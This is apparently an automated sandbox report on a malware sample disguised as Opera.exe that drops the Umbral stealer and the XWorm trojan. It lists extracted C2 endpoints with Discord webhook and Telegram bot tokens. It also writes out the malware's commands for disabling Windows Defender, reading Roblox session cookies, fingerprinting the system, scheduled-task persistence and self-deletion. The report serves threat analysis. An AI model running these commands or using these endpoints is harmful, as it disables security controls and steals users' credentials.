Analysis

  • max time kernel
    110s
  • max time network
    151s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26-04-2024 13:15

General

  • Target

    Opera.exe

  • Size

    319KB

  • MD5

    f69924b642ac4b9ef1dfacdfd43759a9

  • SHA1

    95da50564c7cbc3749148419c68a08b0f2869ee1

  • SHA256

    d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

  • SHA512

    2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

  • SSDEEP

    6144:48loZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmiW2brXv5P:7oZRL+EP8DDUgoOJBiLHaIJtMQIL/5P

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Extracted

Family

xworm

C2

phentermine-partial.gl.at.ply.gg:36969

Attributes
  • Install_directory

    %AppData%

  • install_file

    Client.exe

  • telegram

    https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y

Signatures

  • Detect Umbral payload 3 IoCs
  • Detect Xworm Payload 3 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Opera.exe
    "C:\Users\Admin\AppData\Local\Temp\Opera.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4500
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
        3⤵
        • Views/modifies file attributes
        PID:4476
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2932
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5072
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:668
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:2220
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:2992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1752
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:220
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2880
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • Runs ping.exe
              PID:4460
        • C:\Users\Admin\AppData\Local\Temp\XClient.exe
          "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
          2⤵
          • Drops startup file
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4472
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4204
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:436
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4224
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4580
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
            3⤵
            • Creates scheduled task(s)
            PID:2480
      • C:\Users\Admin\AppData\Roaming\Client.exe
        C:\Users\Admin\AppData\Roaming\Client.exe
        1⤵
        • Executes dropped EXE
        PID:4716
      • C:\Users\Admin\AppData\Roaming\Client.exe
        C:\Users\Admin\AppData\Roaming\Client.exe
        1⤵
        • Executes dropped EXE
        PID:3372

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

        Filesize

        654B

        MD5

        16c5fce5f7230eea11598ec11ed42862

        SHA1

        75392d4824706090f5e8907eee1059349c927600

        SHA256

        87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

        SHA512

        153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        8592ba100a78835a6b94d5949e13dfc1

        SHA1

        63e901200ab9a57c7dd4c078d7f75dcd3b357020

        SHA256

        fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

        SHA512

        87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        338afe10d2e89a4c0a45c948e9d9ea42

        SHA1

        ad20bc0297e2dc6280e669ec76ac12959257d67e

        SHA256

        1ad3d40487ace460cfca036ecfdba4b73fa2bf2db557d4f58e0748aa0ac3faac

        SHA512

        c1e46ed28976586f6f5186237488c14517335595610c7eda6e53e956b645cef5894eeb436f8a25f54c4389ff553457090c770626e991e40688e7c3248fde43a2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        0b7ea66ebb4eca91e4794e6bc19c9a4a

        SHA1

        897f3586ecafe37072ea7786d4f25c359c8060ae

        SHA256

        607d7ac7291760fa591c46d11eff9f8510cafca50df9bf434a913fd0fa3a9cda

        SHA512

        32dff1aaf2519e1b4ac0f82d12037be4d1e1074c6dd0b6c4d41435541235523e7b7cba2bde62caaea576fc902f92275cb3100912b42db3d0cb69a0fe4ff308d1

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        6092470e6488d081f6ada7ae02ba571b

        SHA1

        80d148a208cb1cb0b3f86cab0cff663ad9897366

        SHA256

        a49dd75579b0c24ee1a87736a81394ff575006db5e21b4278f7eb157e65ce712

        SHA512

        85d91e254e98e5f393c7d9f258f3b963fbb79d4048f532a949ae69a715464de85588141ca256af0b0b4c175186fa036b2251ae73bbcaa2fec6333321392c2a57

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        3c2e48a34dbfbe7f8f175c9aeab9ccb8

        SHA1

        8ce17bd98159c3d0aec462ef21a308c4883003ef

        SHA256

        a0ba4fa76f5e68b5cc16cd268a43fe2f989587742f6157de0ff7ef230632390b

        SHA512

        43d5f9c1bda988ad4db7b4265ffdea57374ecf3f4fb04642f95720237a110b8aaec34bd133506f17511829c28bac0880571bd64cacb4e15905c1108ea272f0ac

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        62b4d6a1cae7e82266a3ae89ed95ebbf

        SHA1

        a6852adeafef92bfedc6f9916945366d7549d2a2

        SHA256

        9a8238ac7dfb77498b9dcb5b08cef4dde1eea0e6dbfda95a35c1f2cfe846c82a

        SHA512

        349cd192536e46f8f3aa08ac1f21fdfc72b16830030ff6fb56209022d8264eeef456f4a68769e4be2b25695fc708218b9edd2fe4fe54aae5473f22927e6884c9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        56fa67efa74c34191150ad3843de0dda

        SHA1

        cfa2905dba6ff57d4cf56d505714a2de10c1e19a

        SHA256

        03be8e43f5f7c434365a47890b01245814d2ccc6a3963ca664283c27e60fbde5

        SHA512

        57e721f275fda8947f4ad91dcc131a5a6482e61efcd623a618f1bcde4b79f6b43558070b2cd477eb1841d0f5de19334613e79204be126c2940cd4e5a911df877

      • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

        Filesize

        229KB

        MD5

        7a902c87a60986f18a6b097712299256

        SHA1

        2c01906a39faa9d27a41e0d3cd84e92410b9c483

        SHA256

        e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5

        SHA512

        c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6

      • C:\Users\Admin\AppData\Local\Temp\XClient.exe

        Filesize

        80KB

        MD5

        3fc932775533f1bcea180de679a902dd

        SHA1

        3f393d02af4653e34bf5526ec5b6f8d6e4df65e8

        SHA256

        09a15daeebc228706f36a7659284ef673ea72e7a71700a2f73f4f1409486dd6a

        SHA512

        f59d35a6fe5517a5b9a1ec9a07899eef9f48745710196f1824cc79823994d6fba7975da457ee06ec6215f56860680dc0c07412268c2b1c725c4c66611a75a764

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wyiubl4u.vtg.ps1

        Filesize

        1B

        MD5

        c4ca4238a0b923820dcc509a6f75849b

        SHA1

        356a192b7913b04c54574d18c28d46e6395428ab

        SHA256

        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

        SHA512

        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      • memory/1420-24-0x00000210E6D50000-0x00000210E6DC6000-memory.dmp

        Filesize

        472KB

      • memory/1420-20-0x00000210E6140000-0x00000210E6162000-memory.dmp

        Filesize

        136KB

      • memory/2660-11-0x0000000000400000-0x0000000000457000-memory.dmp

        Filesize

        348KB

      • memory/4472-14-0x00007FFD618A0000-0x00007FFD6228C000-memory.dmp

        Filesize

        9.9MB

      • memory/4472-12-0x0000000000FC0000-0x0000000000FDA000-memory.dmp

        Filesize

        104KB

      • memory/4472-381-0x00007FFD618A0000-0x00007FFD6228C000-memory.dmp

        Filesize

        9.9MB

      • memory/4500-98-0x0000027C64D20000-0x0000027C64D3E000-memory.dmp

        Filesize

        120KB

      • memory/4500-97-0x0000027C64D80000-0x0000027C64DD0000-memory.dmp

        Filesize

        320KB

      • memory/4500-186-0x0000027C7D6F0000-0x0000027C7D702000-memory.dmp

        Filesize

        72KB

      • memory/4500-185-0x0000027C64D40000-0x0000027C64D4A000-memory.dmp

        Filesize

        40KB

      • memory/4500-15-0x0000027C7D780000-0x0000027C7D790000-memory.dmp

        Filesize

        64KB

      • memory/4500-13-0x00007FFD618A0000-0x00007FFD6228C000-memory.dmp

        Filesize

        9.9MB

      • memory/4500-374-0x00007FFD618A0000-0x00007FFD6228C000-memory.dmp

        Filesize

        9.9MB

      • memory/4500-10-0x0000027C630E0000-0x0000027C63120000-memory.dmp

        Filesize

        256KB